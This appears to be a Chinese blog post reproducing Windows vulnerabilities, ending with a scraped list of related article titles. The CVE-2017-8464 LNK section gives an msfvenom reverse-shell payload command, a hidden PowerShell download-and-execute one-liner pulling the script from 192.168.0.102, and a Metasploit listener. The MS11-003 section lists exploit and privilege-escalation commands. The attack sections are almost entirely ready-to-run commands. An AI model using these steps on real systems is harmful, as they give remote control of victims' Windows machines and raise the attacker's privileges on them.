目录

  • 什么是组件
  • 1.CVE-2017-8464
    • 原理
    • 复现
      • 环境部署
      • 远程监听
  • 2.MS11_003 溢出漏洞
    • 原理
    • 复现
      • 下一步提权
  • 3.CVE-2019-0708
  • 4.CVE-2020-0796(永恒之黑)
  • 5.…………………………

什么是组件

组件一般都是系统自带都有的, 如:WINXPWIN2000它本身,就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。
具体方式:

控制面板--添加或删除程序--添加/删除组件

1.CVE-2017-8464

原理

Windows系统使用二进制解析 .LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执行,由于是在explorer.exe进程中运行,所以 load 进内存时与当前用户具有相同权限

复现

环境部署

msfvenom  -p   windows/x64/meterpreter/reverse_tcp  lhost=192.168.0.102   lport=5555  -f  psh-reflection>/opt/search.ps1   #生成shell反弹木马mv  search.ps1  /var/www/html   #木马移动到/var/www/htmlservice apache2 start #启动服务powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.102/search.ps1');test.ps1"    #创建快捷件远程加载

远程监听

use exploit/multi/handler  set payload windows/x64/meterpreter/reverse_tcp  show options  set LHOST 192.168.0.102  set lport  5555    exploit

2.MS11_003 溢出漏洞

原理

溢出漏洞是由于程序中的某个或某些输入函数(使用者输入参数)对所接收数据的边界验证不严密而造成。
根据程序执行中堆栈调用原理,程序对超出边界的部分如果没有经过验证自动去掉,那么超出边界的部分就会覆盖后面的存放程序指针的数据,当执行完上面的代码,程序会自动调用指针所指向地址的命令。

复现

search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set srvhost
set lhost 192.168.0.102
set uripath 00
Run
sessions

下一步提权

use  post/multi/recon/local_exploit_suggester
set LHOST 192.168.0.102
set SESSION 1
Exploit

3.CVE-2019-0708

可参考:
https://blog.csdn.net/yumengzth/article/details/102768945?utm_medium=distribute.pc_relevant.none-task-blog-title-7&spm=1001.2101.3001.4242

4.CVE-2020-0796(永恒之黑)

https://blog.csdn.net/PigLL/article/details/108012981

5.…………………………

Windows系统组件漏洞相关推荐

  1. Windows系统近年漏洞概况及攻击教程防御

    参考:<2018年Windows平台漏洞年度报告>               <burpsuite安全工具使用教程> 一.什么是漏洞? 漏洞是在硬软件,协议的具体实现或系统安 ...

  2. Windows系统漏洞学习总结

    Windows系统常见漏洞分析 由于windows NT/2000操作系统的普及率和市场占有率比较高,所以很容易使它成为很多黑客攻击的目标.目前,Windows NT/2000最主要的漏洞有Unico ...

  3. McAfee Agent漏洞可导致黑客以Windows 系统权限运行代码

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 McAfee Enterprise(现更名为 Trellix)修复了McAfee Agent 软件 Windows 版中的一个漏洞(CVE-20 ...

  4. 严重的 BootHole 漏洞影响所有 Linux 发行版和 Windows 系统(详细分析)

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 Eclypsium 公司发现,GRUB2 引导程序 (bootloader) 中存在"BootHole" 漏洞,导 ...

  5. 微软修复打印机服务漏洞 所有支持Windows系统都受影响

    在本月的补丁星期二活动日中,在常规安全公告中涵盖一项Windows Print Spooler组件系统的漏洞,Windows Vista及更高版本都受影响可能会导致某些安全问题. 根据微软安全公告MS ...

  6. python dos攻击_利用SMB漏洞DoS攻击任何Windows系统

    原标题:利用SMB漏洞DoS攻击任何Windows系统 近日微软报出SMB V1存在漏洞,安全研究员并将此漏洞称作 " SMBLoris ",解释其能够发动拒绝服务(Dos)攻击, ...

  7. Windows系统帮助中心程序的0day漏洞

    金山网盾监测到一个新的0day漏洞,这是一个基于Windows系统帮助中心程序的0day漏洞,它是由于帮助中心程序进行格式处理时调用hcp协议的一个错误引起的.***者利用这个漏洞可以在用户的电脑上执 ...

  8. [网络安全自学篇] 三十四.Windows系统安全缺陷之5次Shift漏洞启动计算机机理分析

    这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文详细讲解了绕狗一句话原理.绕过安全狗的常用方法和过狗菜刀,并实践安装安全狗进 ...

  9. 64位windows系统如何显示32位dcom组件配置

    在运行栏中输入命令:dcomcnfg,打开组件服务管理窗口,但是却发现找不到Microsoft Excel程序,这主要是64位系统的问题,excel是32位的组件,所以在正常的系统组件服务里是看不到的 ...

最新文章

  1. mysql时间复杂度o的n次方_MySQL性能测试调优
  2. hadoop-0.20.2安装配置
  3. 【原】docker部署单节点consul
  4. python写字板_pywinauto简单操作写字板的例子
  5. MATLAB的Kmeans函数实现聚类
  6. 【C语言】C语言的数据类型
  7. 深度学习自学(十五):人脸识别数据预处理方法
  8. Git和Cmake下载超级慢的解决方案
  9. 天刀 服务器状态,12月11日服务器例行维护公告(已完成)
  10. PHP LOL接口,电竞数据API接口|英雄联盟lol|联赛统计|API调用示例代码
  11. jQWidgets v8.0.0正式发布
  12. 【con】rounded不起作用(前端bug日记3)
  13. 微信分享网页链接自定义图片和文字描述
  14. 解决win7防火墙打不开的问题:错误代码1079和错误代码13
  15. 视频压缩编码和音频压缩编码基本原理
  16. 一分钟了解“#include iomanip”
  17. Kotlin高仿微信-第35篇-支付-二维码收款(二维码)
  18. Linphone android去电增加自定义SIP消息头的流程分析
  19. PostgreSQL trigger
  20. 黄金斗士原生android,联想黄金斗士S8手机怎么样 黄金斗士S8真机评测详细图解

热门文章

  1. SkeyeRTSPLive高效转码之SkeyeVideoDecoder采用Nvidia独立显卡高效硬件解码解决方案(附源码)
  2. CREO:CREO软件之工程图【插入页面】、【装配图出工程图】、【将视图转为绘制图元】、【工程图输入到CAD中去修改】的简介及其使用方法(图文教程)之详细攻略
  3. 最好社区运营,就要积分激励体系
  4. php sqlite3菜鸟,SQLite 创建数据库 | 菜鸟教程
  5. t3系统总显示得不到服务器,用友T3不能连接服务器你好,用友T3总是说连接不到服务...
  6. 【P2303】Longge的问题
  7. 差分管电路图_差分电路
  8. 南京信息工程大学本科毕业论文答辩和论文选题PPT模板
  9. 使用QAxObject将原来的Excel数据转换为PDF
  10. 张瑞敏:人不成熟的六大特征